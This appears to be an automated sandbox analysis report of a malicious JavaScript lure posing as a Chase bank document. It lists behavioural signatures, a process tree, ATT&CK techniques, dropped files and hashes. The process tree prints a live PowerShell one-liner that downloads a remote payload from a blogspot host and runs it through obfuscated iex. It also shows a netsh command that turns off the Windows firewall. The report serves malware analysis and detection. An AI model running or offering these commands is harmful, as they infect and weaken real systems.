Analysis
-
max time kernel
137s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
16-01-2024 10:39
General
-
Target
New_ScanDoc#092387CHASEeAdvice.js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
UAC bypass 3 TTPs 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Registers COM server for autorun 1 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies registry class 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 38 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE98.tmp" "c:\Users\Admin\AppData\Local\Temp\dvab1sqt\CSC596A6479DCE643D5AB88413845D2E882.TMP"4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7844⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER606C.tmp.xmlFilesize
4KB
MD533f1fb1effbbdcb3bd949836209447ee
SHA1cb6251488d53daad1b561a2091708bbd314df72e
SHA256aefb586921e61da8cea99877e479e2cf6d693883bcdf3c1dd285ccd12d01f2bf
SHA512cbb995add329ca6079e5cc2b1f09d7a280990105cafd8f4349fafa92deb2d01293439a6e9f6dc6136252d75abd1c69443f147dab8e3bcaaba9b14751ef901ecc
-
C:\Users\Admin\AppData\Local\Temp\RESDE98.tmpFilesize
1KB
MD5acd5dac3e92b3c07df3ad28fed23c928
SHA1fb8bd2dcbea4b0eab3c012df115683c8760728ea
SHA2563bef46c928e0e8245d3460a5c1d3a39609eff7dba7adbe699ce37dd34b8771b0
SHA5120669ec9645a61c03f46908b77e3dd870eece76b50415d6216f48c1c8b6d0bddbd4bca4e7d7ac3278614d79db37ea52450449a6664fd7fef22e5633e7025cf0e5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hz2ugr2.pm5.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.dllFilesize
3KB
MD5dcd5e0888cfd3f9f2eece002db999a19
SHA1af0308320dd4cfce06a4c8ecb8f9743aa87d5b75
SHA25604447919bd60cd9d6df421ce8f1a9f1dfc2b64a3c24b1ee90fa41a197c47f2b2
SHA5122373a81a09b082e792f14ad84202621bda874f9416a23b7bbc746a6d5730b1dbbd574d9043a0114bdb73919b59bc3c5d84e06addaa9806bb22aec8947269b8b6
-
\??\c:\Users\Admin\AppData\Local\Temp\dvab1sqt\CSC596A6479DCE643D5AB88413845D2E882.TMPFilesize
652B
MD5e1e96b3459f4c8d3e3698850f799a332
SHA1882e9ad01c788001a36af5cc03b46ee7a28ba52b
SHA256fdcbfff166d944d63a754b0098db064dfbb0674106b2dd1e47fd11e0036f1b16
SHA512dc6c63f01b90246f5d822d69cb49716df6f7e180e37151a831fe9bff1c6d9089341b57af8bc6670c01e46e8b0ea4572dcb53499c60349ea40dc4355834bd137d
-
\??\c:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.0.csFilesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
\??\c:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.cmdlineFilesize
369B
MD56e71e18be08b7b70742b999d9672127f
SHA198071edf4521415b98cd738c5e50fe58c1d58a49
SHA25653b56d29b68c3e64f6544f136f69e8b35d120a785d941497a045ddc2e66f32e0
SHA5120181034575d64fd749bd1946e521b07376cb402c0dcd45d0bd58f29ef9b61576be659dfc05df35cfe88c83723cf93a0e38a7a3aca026d76092fcb69181e790c2
-
memory/1076-28-0x00000239B6C00000-0x00000239B6C08000-memory.dmpFilesize
32KB
-
memory/1076-10-0x00007FFEBD1F0000-0x00007FFEBDCB1000-memory.dmpFilesize
10.8MB
-
memory/1076-13-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-11-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-12-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-9-0x00000239B6850000-0x00000239B6872000-memory.dmpFilesize
136KB
-
memory/1076-30-0x00007FFEBD1F0000-0x00007FFEBDCB1000-memory.dmpFilesize
10.8MB
-
memory/1076-31-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-32-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-33-0x000002399C320000-0x000002399C32E000-memory.dmpFilesize
56KB
-
memory/1076-34-0x000002399C360000-0x000002399C37A000-memory.dmpFilesize
104KB
-
memory/1076-71-0x00007FFEBD1F0000-0x00007FFEBDCB1000-memory.dmpFilesize
10.8MB
-
memory/1076-68-0x000002399C690000-0x000002399C6A0000-memory.dmpFilesize
64KB
-
memory/1076-14-0x00000239B6DF0000-0x00000239B6FB2000-memory.dmpFilesize
1.8MB
-
memory/1608-39-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB
-
memory/1608-40-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB
-
memory/1608-58-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB
-
memory/3624-38-0x0000000001100000-0x000000000118C000-memory.dmpFilesize
560KB
-
memory/3624-35-0x0000000000400000-0x000000000048C000-memory.dmpFilesize
560KB
-
memory/3624-45-0x0000000005880000-0x000000000591C000-memory.dmpFilesize
624KB
-
memory/3624-74-0x00000000057D0000-0x00000000057E0000-memory.dmpFilesize
64KB
-
memory/3624-46-0x0000000005920000-0x00000000059B2000-memory.dmpFilesize
584KB
-
memory/3624-73-0x00000000745F0000-0x0000000074DA0000-memory.dmpFilesize
7.7MB
-
memory/3624-49-0x00000000059C0000-0x0000000005A10000-memory.dmpFilesize
320KB
-
memory/3624-72-0x00000000071C0000-0x00000000071CA000-memory.dmpFilesize
40KB
-
memory/3624-51-0x0000000005BE0000-0x0000000005DA2000-memory.dmpFilesize
1.8MB
-
memory/3624-42-0x0000000005810000-0x0000000005876000-memory.dmpFilesize
408KB
-
memory/3624-41-0x0000000005DC0000-0x0000000006364000-memory.dmpFilesize
5.6MB
-
memory/3624-43-0x00000000057D0000-0x00000000057E0000-memory.dmpFilesize
64KB
-
memory/3624-36-0x00000000745F0000-0x0000000074DA0000-memory.dmpFilesize
7.7MB
-
memory/3872-67-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB
-
memory/3872-50-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB
-
memory/3872-48-0x0000000001010000-0x0000000001020000-memory.dmpFilesize
64KB
-
memory/3872-47-0x0000000072B50000-0x0000000073101000-memory.dmpFilesize
5.7MB